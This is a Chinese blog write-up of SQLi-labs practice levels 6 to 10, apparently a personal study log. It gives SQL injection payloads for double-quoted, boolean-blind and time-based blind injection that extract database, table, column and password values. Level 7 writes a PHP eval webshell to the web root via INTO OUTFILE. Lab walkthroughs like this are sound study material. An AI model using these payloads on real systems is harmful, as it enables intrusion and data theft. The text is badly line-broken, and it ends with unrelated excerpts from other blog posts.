重闖Sqli labs關卡第三天 6 10關

2021-10-02 13:03:45 字數 2886 閱讀 7596

第六關(雙注入get雙引號字元型注)

核心**:

1 $id ='"


'.$id.'"'


;2 $sql="select


*from users where id=$id limit 0,1";

根第五關類似

第七關(匯出檔案get字元型注入)

核心**

$sql="select


*from users where id=(('


$id')) limit 0,1";

不返回mysql錯誤

檢測secure_file_prive是否為null 是null則不能寫入

show variables like 「secure_file_priv」;

secure_file_priv =空才行

payload:

id=1'


)) and 1=1--+


id=1


')) and1=


2--+#寫入一句話webshellid=


1'))union select 1,"<?php @eval($_post[


'x']);?>",3 into outfile "c:\\phpstudy\\phptutorial\\www\\lou\\sql\\less-7\\muma.php"--+

參考學習:

第八關(布林型單引號get盲注)

payload:

1


判斷資料庫長度2'


and length(database())=8--+


3爆資料庫名4'


andleft((select


database()),1)='s


'--+5


判斷資料庫中表的數量6'


and if((select count(*) from information_schema.tables where table_schema=database())>1,sleep(5),1)--+7'


and (select


count(*) from information_schema.tables where table_schema=


database())>1--


+8爆表名9


'and left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)=


'r'--+


10判斷字段數量11'


and (select


count(*) from information_schema.columns where table_name=


'users


')>1--


+12爆欄位名13'


and left((select column_name from information_schema.columns where table_name=


'users'


limit 1,1),1)=


'f'--+


14爆資料15'


andleft((select password from users limit 0,1),1)='d


'--+

第九關(基於時間的get單引號盲注)

payload:

1


'and if(length(database())=8,sleep(3),1)--+2'


andif(left(database(),1)='s


',sleep(3),1)--+3


'and if(left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)=


'r',sleep(3),1)--+4'


andif(left((select column_name from information_schema.columns where table_name=


'users


' limit 4,1),8)=


'password


',sleep(3),1)--+5


'and if(left((select password from users limit 0,1),1)=


'd',sleep(3),1) --+

第十關(基於時間的雙引號盲注)

payload:

1 " and


if(length(database())=


8,sleep(3),1)--


+2 " and


if(left(database(),1)='s


',sleep(3),1)--


+3 " and


if(left((select table_name from information_schema.tables where table_schema=


database() limit 1,1),1)='r


',sleep(3),1)--


+4 " and


if(left((select column_name from information_schema.columns where table_name=


'users


' limit 4,1),8)=


'password


',sleep(3),1)--


+5 " and


if(left((select password from users limit 0,1),1)='d


',sleep(3),1)--


+

11111

11111

第三天,努力!!

第三天了,不錯不錯,基本上按自己的計畫進行著,雖然工作還是沒找到,不過也不再那麼的怕了,慢慢來吧,其實也沒太多時間了 今天早上十點才,真的覺得自己太不像話了,不過我一覺醒來就那個時候了,我的手機每天的鬧鐘是7 30不過好像從來聽不見它響,哈哈 明天希望能早點起,明天北京工體有乙個大型的招聘會,可以去...

杭州第三天

一樣的時間起床,一樣的時間去吃早飯,坐在一樣的位置享受完幾乎一樣的陽光和一根煙以後,我開始了在杭州ut的又一天工作。上午按照計畫重新安裝oracle資料庫,由於一邊安裝一邊給旁邊的兩個同事作簡單的解釋,所以到了在中午吃飯以前只是安裝完了軟體部分。ut的食堂有兩層,每個月的餐費都是直接打入員工卡中,所...

實習第三天

sharedpreferences是android平台上乙個輕量級的儲存類,簡單的說就是可以儲存一些我們需要的變數資訊 例如 程式聲音開關 大小,設定自動登入記住賬號對賬號 密碼的儲存,對預設事項的紀錄等。1 intent bundle的傳送方式 2 利用sharedpreferences acti...